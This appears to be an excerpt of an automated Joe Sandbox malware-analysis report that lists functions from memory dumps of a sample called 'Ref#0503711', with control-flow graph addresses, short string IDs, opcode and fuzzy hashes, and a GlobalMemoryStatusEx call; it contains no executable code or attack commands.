                                                                control_flow_graph 1782 6b591b3-6b591e5 1783 6b591e7-6b591ea 1782->1783 1784 6b59210-6b59213 1783->1784 1785 6b591ec-6b5920b 1783->1785 1786 6b59ad3-6b59ad5 1784->1786 1787 6b59219-6b5922e 1784->1787 1785->1784 1789 6b59ad7 1786->1789 1790 6b59adc-6b59adf 1786->1790 1794 6b59246-6b5925c 1787->1794 1795 6b59230-6b59236 1787->1795 1789->1790 1790->1783 1791 6b59ae5-6b59aef 1790->1791 1799 6b59267-6b59269 1794->1799 1796 6b59238 1795->1796 1797 6b5923a-6b5923c 1795->1797 1796->1794 1797->1794 1800 6b59281-6b592f2 1799->1800 1801 6b5926b-6b59271 1799->1801 1812 6b592f4-6b59317 1800->1812 1813 6b5931e-6b5933a 1800->1813 1802 6b59275-6b59277 1801->1802 1803 6b59273 1801->1803 1802->1800 1803->1800 1812->1813 1818 6b59366-6b59381 1813->1818 1819 6b5933c-6b5935f 1813->1819 1824 6b59383-6b593a5 1818->1824 1825 6b593ac-6b593c7 1818->1825 1819->1818 1824->1825 1830 6b593f2-6b593fc 1825->1830 1831 6b593c9-6b593eb 1825->1831 1832 6b5940c-6b59486 1830->1832 1833 6b593fe-6b59407 1830->1833 1831->1830 1839 6b594d3-6b594e8 1832->1839 1840 6b59488-6b594a6 1832->1840 1833->1791 1839->1786 1844 6b594c2-6b594d1 1840->1844 1845 6b594a8-6b594b7 1840->1845 1844->1839 1844->1840 1845->1844
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q
                                                                • API String ID: 0-355816377
                                                                • Opcode ID: 21bc6c55e11a1275f26269f39c3176f37520688ffcb92ad1a9c5e0846c03f7ff
                                                                • Instruction ID: 1b4e346204a3481b0061c11220d8206fb54d9ecbd9990a26df1d9b6874f70c06
                                                                • Opcode Fuzzy Hash: 21bc6c55e11a1275f26269f39c3176f37520688ffcb92ad1a9c5e0846c03f7ff
                                                                • Instruction Fuzzy Hash: 4E514370B0011ADFDB54EB74D960BAEB3F6EBC8244F108569C80DDB394EA31DC468B95
                                                                Function 06B54C00 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1848 6b54c00-6b54c34 1849 6b54c36-6b54c39 1848->1849 1850 6b54c3b-6b54c55 1849->1850 1851 6b54c5a-6b54c5d 1849->1851 1850->1851 1852 6b54c63-6b54d5b 1851->1852 1853 6b5533c-6b5533e 1851->1853 1871 6b54d61-6b54dae call 6b554b8 1852->1871 1872 6b54dde-6b54de5 1852->1872 1855 6b55345-6b55348 1853->1855 1856 6b55340 1853->1856 1855->1849 1857 6b5534e-6b5535b 1855->1857 1856->1855 1885 6b54db4-6b54dd0 1871->1885 1873 6b54e69-6b54e72 1872->1873 1874 6b54deb-6b54e5b 1872->1874 1873->1857 1891 6b54e66 1874->1891 1892 6b54e5d 1874->1892 1888 6b54dd2 1885->1888 1889 6b54ddb 1885->1889 1888->1889 1889->1872 1891->1873 1892->1891
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fcq$XPcq
                                                                • API String ID: 0-936005338
                                                                • Opcode ID: c0168aff959548e3480573ef758858abd5b5ff36676e5c3b5076b8eae8f23552
                                                                • Instruction ID: 281636c1ef4758fdc3b4143fdd581e7c42721b1f2db2a1acee19ed6619e3a4be
                                                                • Opcode Fuzzy Hash: c0168aff959548e3480573ef758858abd5b5ff36676e5c3b5076b8eae8f23552
                                                                • Instruction Fuzzy Hash: F7518B70F102199FEB54DFB5C854BAEBAF6FF88700F208529D50AAB394DB748C458B91
                                                                Function 012CE9A0 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2054 12ce9a0-12ce9bb 2056 12ce9bd-12ce9e4 call 12ce20c 2054->2056 2057 12ce9e5-12cea04 call 12ce218 2054->2057 2063 12cea0a-12cea69 2057->2063 2064 12cea06-12cea09 2057->2064 2071 12cea6f-12ceafc GlobalMemoryStatusEx 2063->2071 2072 12cea6b-12cea6e 2063->2072 2075 12ceafe-12ceb04 2071->2075 2076 12ceb05-12ceb2d 2071->2076 2075->2076
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2918236224.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_12c0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8e3977bb00bf8df0920a3a6dd80c6be2bcbccc44a0c6444126425bab794abc2c
                                                                • Instruction ID: d8445d5560f5509e64fd18f65d8ca3f926c61d71f3bfba970fb4b568d1e02495
                                                                • Opcode Fuzzy Hash: 8e3977bb00bf8df0920a3a6dd80c6be2bcbccc44a0c6444126425bab794abc2c
                                                                • Instruction Fuzzy Hash: F6412372E143968FC700DFB9D8142AEBFF1AF89310F15866ED644A7251DB349845CBD1
                                                                Function 012CEA88 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2079 12cea88-12ceac6 2080 12ceace-12ceafc GlobalMemoryStatusEx 2079->2080 2081 12ceafe-12ceb04 2080->2081 2082 12ceb05-12ceb2d 2080->2082 2081->2082
                                                                APIs
                                                                • GlobalMemoryStatusEx.KERNELBASE ref: 012CEAEF
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2918236224.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_12c0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus
                                                                • String ID:
                                                                • API String ID: 1890195054-0
                                                                • Opcode ID: cb2358df4467d7724938de7947a224acfef0ab344b56b0e01aee0c84d2a3edc0
                                                                • Instruction ID: d922bd1b564c945b25e549c96aefbe27be679a9e49697680037a400786c0a525
                                                                • Opcode Fuzzy Hash: cb2358df4467d7724938de7947a224acfef0ab344b56b0e01aee0c84d2a3edc0
                                                                • Instruction Fuzzy Hash: 1411E2B2C006699BCB10DF9AC544BDEFBF4BB48320F15816AD918A7251D378A944CFA5
                                                                Function 06B5DB2D Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2085 6b5db2d-6b5db57 2086 6b5db59-6b5db5c 2085->2086 2087 6b5db7f-6b5db82 2086->2087 2088 6b5db5e-6b5db7a 2086->2088 2089 6b5db84 2087->2089 2090 6b5db91-6b5db94 2087->2090 2088->2087 2096 6b5db8a-6b5db8c 2089->2096 2091 6b5dbc7-6b5dbc9 2090->2091 2092 6b5db96-6b5dbc2 2090->2092 2094 6b5dbd0-6b5dbd3 2091->2094 2095 6b5dbcb 2091->2095 2092->2091 2094->2086 2097 6b5dbd5-6b5dbe4 2094->2097 2095->2094 2096->2090 2100 6b5dd69-6b5dd93 2097->2100 2101 6b5dbea-6b5dc23 2097->2101 2104 6b5dd94 2100->2104 2108 6b5dc25-6b5dc2f 2101->2108 2109 6b5dc71-6b5dc95 2101->2109 2104->2104 2112 6b5dc47-6b5dc6f 2108->2112 2113 6b5dc31-6b5dc37 2108->2113 2117 6b5dc97 2109->2117 2118 6b5dc9f-6b5dd63 2109->2118 2112->2108 2112->2109 2115 6b5dc39 2113->2115 2116 6b5dc3b-6b5dc3d 2113->2116 2115->2112 2116->2112 2117->2118 2118->2100 2118->2101
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: 514ed30642dc1fcf0fe3ed1e4fc048f4dea54af7df36eb640d22abf98772a7c0
                                                                • Instruction ID: de4599632fe9b0c15188137db313ddc3d75d6343da230af105521e10da69eaa7
                                                                • Opcode Fuzzy Hash: 514ed30642dc1fcf0fe3ed1e4fc048f4dea54af7df36eb640d22abf98772a7c0
                                                                • Instruction Fuzzy Hash: C941D1B0E0020ADFDB61DF65D4447DEBBB2EF85300F11466AD801EB240DBB4D946CB95
                                                                Function 06B5227D Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: 56551ddeee302372b4e6ee466ac6eb8dd745d35cfb001501c3bcc40bad6f0300
                                                                • Instruction ID: 8719e943a3d3d68a58c066c2de4a6ff98c8b493fd5e11dd244fad9257d146add
                                                                • Opcode Fuzzy Hash: 56551ddeee302372b4e6ee466ac6eb8dd745d35cfb001501c3bcc40bad6f0300
                                                                • Instruction Fuzzy Hash: 8B312470B112058FDBA99B30C5543AE77A3EF88200F1154A9D806DB384DE39DE4ACBA5
                                                                Function 06B52290 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: 62972b7a0322f66963dee30afcd1cc6b5972b291f4126d6edeb538308baeb5b6
                                                                • Instruction ID: 92afcd43fbd79d19f9674e16a56568c800ebc550caae470e2c8283cf177539e1
                                                                • Opcode Fuzzy Hash: 62972b7a0322f66963dee30afcd1cc6b5972b291f4126d6edeb538308baeb5b6
                                                                • Instruction Fuzzy Hash: E531E570B002058FDB699B74D5547AF77E3EF88200F105468D806DB394DE79DE4ACBA5
                                                                Function 06B52284 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: 96d736e12b2cd6cb9b7a1fb930428a9c138a54e1cce9d6df8027c4df0ee4bd21
                                                                • Instruction ID: 5b2166d4ce8ff808c27e36138bb53ebc48a7defcb0a40390b8d1318176ff9ebe
                                                                • Opcode Fuzzy Hash: 96d736e12b2cd6cb9b7a1fb930428a9c138a54e1cce9d6df8027c4df0ee4bd21
                                                                • Instruction Fuzzy Hash: 54310370B112058FDB699B30D5543AF77A3EF88200F1154A9D806DB384DF79DE4ACBA5
                                                                Function 06B52288 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: 2507cfded46b61cc7f73c7a2990b82020233ad795d9f68013c987f8a688500f6
                                                                • Instruction ID: 0af8dc55c02b9cd1ef73aa2788b433d39a095be38f8fd69d0ccf310373222999
                                                                • Opcode Fuzzy Hash: 2507cfded46b61cc7f73c7a2990b82020233ad795d9f68013c987f8a688500f6
                                                                • Instruction Fuzzy Hash: EE310370B102058FDB699B30D5543AF77A3EF88200F1058A8D806DB384DE39DE4ACBA5
                                                                Function 06B5228C Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: 6e1330eabf2848f7975f3e07bc54430a6e6f9c8fc14fdb65d3a37b72e5801986
                                                                • Instruction ID: 590c28fb2a331b64362cfecc7233248a6df0645e8b1c17dd88f7c13264737ed1
                                                                • Opcode Fuzzy Hash: 6e1330eabf2848f7975f3e07bc54430a6e6f9c8fc14fdb65d3a37b72e5801986
                                                                • Instruction Fuzzy Hash: 73310330B002058FDB699B30D5543AE7BE3EF88200F1054A8D806DB384EE79DE4ACBA5
                                                                Function 06B58340 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q
                                                                • API String ID: 0-388095546
                                                                • Opcode ID: 7c6c9e5b8203994d30b78f1c7f4e16ca8520a2a20a533486af7cf3e419e2be1e
                                                                • Instruction ID: cd78b68f6ddd1697d037f0afa8856715284f12bab7156e3d815480e6523e385f
                                                                • Opcode Fuzzy Hash: 7c6c9e5b8203994d30b78f1c7f4e16ca8520a2a20a533486af7cf3e419e2be1e
                                                                • Instruction Fuzzy Hash: AEF0FFB5A04225CFDF789E45E9917FC73A6EB40300F0244B6ED06CB254CB31D906C790
                                                                Function 06B54330 Relevance: .2, Instructions: 233COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c64edacc1d3bf54c40e27777d9b6433d1f519502808a3ace0417c877045b27df
                                                                • Instruction ID: ababf51c0d99c0ba70228869e1aa171db8a707b3381b0cb664e5b314fa81ad2f
                                                                • Opcode Fuzzy Hash: c64edacc1d3bf54c40e27777d9b6433d1f519502808a3ace0417c877045b27df
                                                                • Instruction Fuzzy Hash: C7817C70B002098FDF54DFB9D4507AEB7F2AF89304F1185A9D80ADB395EA34DC868B91
                                                                Function 06B56268 Relevance: .2, Instructions: 229COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4a6f71801a84bdaac85d961a6279ffa40fbfd573ec440bd5f0a4c0790fcf54d4
                                                                • Instruction ID: d40dd5d800e109585205aab91c1e3e67c6e69fd734969cd83e358be169a4c11c
                                                                • Opcode Fuzzy Hash: 4a6f71801a84bdaac85d961a6279ffa40fbfd573ec440bd5f0a4c0790fcf54d4
                                                                • Instruction Fuzzy Hash: 8161C1B1F001214FCB549A7EC8846AFBAD7EFC4620B564479D80EDB364EE66DD0287C6
                                                                Function 06B54660 Relevance: .2, Instructions: 221COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4bc4551bede21c08843e5b89136b9b253ea4777d63537b8d9d5b5c0775bc67a9
                                                                • Instruction ID: 43f5e51365d280e49b7734db288fd0bba6ecb875b801819505cf3beae7b8b140
                                                                • Opcode Fuzzy Hash: 4bc4551bede21c08843e5b89136b9b253ea4777d63537b8d9d5b5c0775bc67a9
                                                                • Instruction Fuzzy Hash: 4B913B70E102198FDF60DF68C990BDDB7B1FF89300F208699D549AB295DB70AA85CF91
                                                                Function 06B54678 Relevance: .2, Instructions: 210COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7acbca55b0491cb1cc1aece246d2c5d14af59857d8fa37863be6ac8805597583
                                                                • Instruction ID: 7e2cf6b30e2be82d9e5a2ddc4d085bffea68bf3ddf96150bf38ee3b77fb5e9a6
                                                                • Opcode Fuzzy Hash: 7acbca55b0491cb1cc1aece246d2c5d14af59857d8fa37863be6ac8805597583
                                                                • Instruction Fuzzy Hash: 77913C70E106198FDF60DF68C880BDDB7B1FF89300F208699D549AB255DB70AA85CF91
                                                                Function 06B5EB8A Relevance: .2, Instructions: 204COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7eaa41618bc9dab56b5809f1721a2b64d52d9ae172ea021e01995fa87268dd6c
                                                                • Instruction ID: b2d6c8d9593599bc33aa7c8fcc18433b7fa021de0847eee550489f0da6f16b9c
                                                                • Opcode Fuzzy Hash: 7eaa41618bc9dab56b5809f1721a2b64d52d9ae172ea021e01995fa87268dd6c
                                                                • Instruction Fuzzy Hash: 9F713870A002199FCB54EBA9D980AEEBBF6FF88300F158569D419EB354DB30E946CB50
                                                                Function 06B5EB98 Relevance: .2, Instructions: 201COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a378bb14bd29d017f85d6aef006c7b05d1ddb30786174ce7e2c25c871429fc3f
                                                                • Instruction ID: fdaa673512fe4a915605249031a138dcb2baf074dd8956d404f42763ead4cb6c
                                                                • Opcode Fuzzy Hash: a378bb14bd29d017f85d6aef006c7b05d1ddb30786174ce7e2c25c871429fc3f
                                                                • Instruction Fuzzy Hash: 51712A70A002199FDB54EFA9D980AAEBBF6FF88300F158569D415EB358DB30ED46CB50
                                                                Function 06B5FCF7 Relevance: .2, Instructions: 175COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3c04840b0f49b9e9b071dae131b97803998db153b01cd5be6848371647a58fcb
                                                                • Instruction ID: 1d3dbe44faad7e788352f86f467658f51c2b0d62c4c061060fb5b5c85ca7c965
                                                                • Opcode Fuzzy Hash: 3c04840b0f49b9e9b071dae131b97803998db153b01cd5be6848371647a58fcb
                                                                • Instruction Fuzzy Hash: 7351CEB1E112059FCB24EFB8E4446FDFBB6EF89310F1148A9E506D7290DB358855CB81
                                                                Function 06B5FAA9 Relevance: .2, Instructions: 174COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ef9b127d3db59c9763f6fa48ce8e4bca184d93a1949398b9a98ad43cd51b007b
                                                                • Instruction ID: ea721813361c730413e7a3f76c61d8ec9f7445c67bb40e936795ade205c031f7
                                                                • Opcode Fuzzy Hash: ef9b127d3db59c9763f6fa48ce8e4bca184d93a1949398b9a98ad43cd51b007b
                                                                • Instruction Fuzzy Hash: E4512870B20214DFEF60666CDD547BF665FD789300F20097AE90AD3799CA29CC858BA2
                                                                Function 06B5FAB8 Relevance: .2, Instructions: 163COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ba04ae3de87adfe79cba7c44bd7dde63052e704f1a8a96127ca6affba9a385ee
                                                                • Instruction ID: 95d81d4f2e66f88e807b59c695b0328e1b2782498fe57c4c2db3456b0609ce7d
                                                                • Opcode Fuzzy Hash: ba04ae3de87adfe79cba7c44bd7dde63052e704f1a8a96127ca6affba9a385ee
                                                                • Instruction Fuzzy Hash: D2512970B20218DFEF60666CD9547BF665FD789300F20097AE90AD3799CA39CC858B92
                                                                Function 06B554B8 Relevance: .1, Instructions: 131COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d047fff5c351e00882a190ba1c27d41fd6d403049b82c37ecc14ec029809ccd1
                                                                • Instruction ID: 3c3293d1fb0010d1fa76ebdedf5448f5a53d3db5bd055b61fadb553778702116
                                                                • Opcode Fuzzy Hash: d047fff5c351e00882a190ba1c27d41fd6d403049b82c37ecc14ec029809ccd1
                                                                • Instruction Fuzzy Hash: 9D417BB2E006098FCB70CFA9D880BAFF7B2EB84311F10496AD616D7654D330E9558B91
                                                                Function 06B52140 Relevance: .1, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 278928a30ac51db8cf62ec9b40ec54be955094f0f3329cc760d2f226f1a36572
                                                                • Instruction ID: f5989d88ac12578c0f4c5d1ab407d0fc98002074be08a3d2b2b1a4fd4fc49f6d
                                                                • Opcode Fuzzy Hash: 278928a30ac51db8cf62ec9b40ec54be955094f0f3329cc760d2f226f1a36572
                                                                • Instruction Fuzzy Hash: 1131AB75E102159BDB49CFA4D844AAEB7B6EF88300F118519E80AA7350EB71AE46CB80
                                                                Function 06B52145 Relevance: .1, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 33ffaaac866cc4978111e9738a19c4ddb996ad6a8290b41b636522eb854d4c47
                                                                • Instruction ID: 9e3b5e0c90c29c92d0b5ba99b8486fc5c2ce47e37581c8aa3ba37e31f100f30d
                                                                • Opcode Fuzzy Hash: 33ffaaac866cc4978111e9738a19c4ddb996ad6a8290b41b636522eb854d4c47
                                                                • Instruction Fuzzy Hash: A531AB75E102159BDB49CFA5D854B9EB7B2FF88300F158519EC06E7350EB71AD46CB80
                                                                Function 06B52150 Relevance: .1, Instructions: 91COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1adb130354d73d769707a782fe0d6998c826165a22c7fddbab04763cd71f24e7
                                                                • Instruction ID: 54350a4adde0d9444a8bfbbff07ee486ddd2b5c5df5f571412db608e44bc3873
                                                                • Opcode Fuzzy Hash: 1adb130354d73d769707a782fe0d6998c826165a22c7fddbab04763cd71f24e7
                                                                • Instruction Fuzzy Hash: 8D31AC75E102199BDB49CFA5D854A9EB7F6FF89300F148529EC06E7340EB71AD46CB80
                                                                Function 06B5214C Relevance: .1, Instructions: 91COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e05f9ee020384f6004ec1413d005ef61ea97de0cd057a68dc5eaaf6150ae08d2
                                                                • Instruction ID: cfb357e433aebe6df6cd5641a1bebf445b7796bf61e328918fdbfeae0684222b
                                                                • Opcode Fuzzy Hash: e05f9ee020384f6004ec1413d005ef61ea97de0cd057a68dc5eaaf6150ae08d2
                                                                • Instruction Fuzzy Hash: 80319A75E102199BDB49DFA5D854A9EB7F2FF89300F148529EC06EB340EB71AD46CB80
                                                                Function 06B52149 Relevance: .1, Instructions: 91COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9dc7463c7ca3e1b2213176e56b6026bedc0496ed955de2991265974631386e62
                                                                • Instruction ID: a4e89b6007bde43ef224a19a00df3594c704dcb6b9bf6852e4e6cbfa21cd10aa
                                                                • Opcode Fuzzy Hash: 9dc7463c7ca3e1b2213176e56b6026bedc0496ed955de2991265974631386e62
                                                                • Instruction Fuzzy Hash: 3C319A75E202159BDB49CFA5D854A9EB7B2FF88300F158529EC06E7350EB71AD46CB80
                                                                Function 06B53B41 Relevance: .1, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5cbbebd0111d4c30626a8d814cf1f113a397f198479acfc5ff47df34707a257d
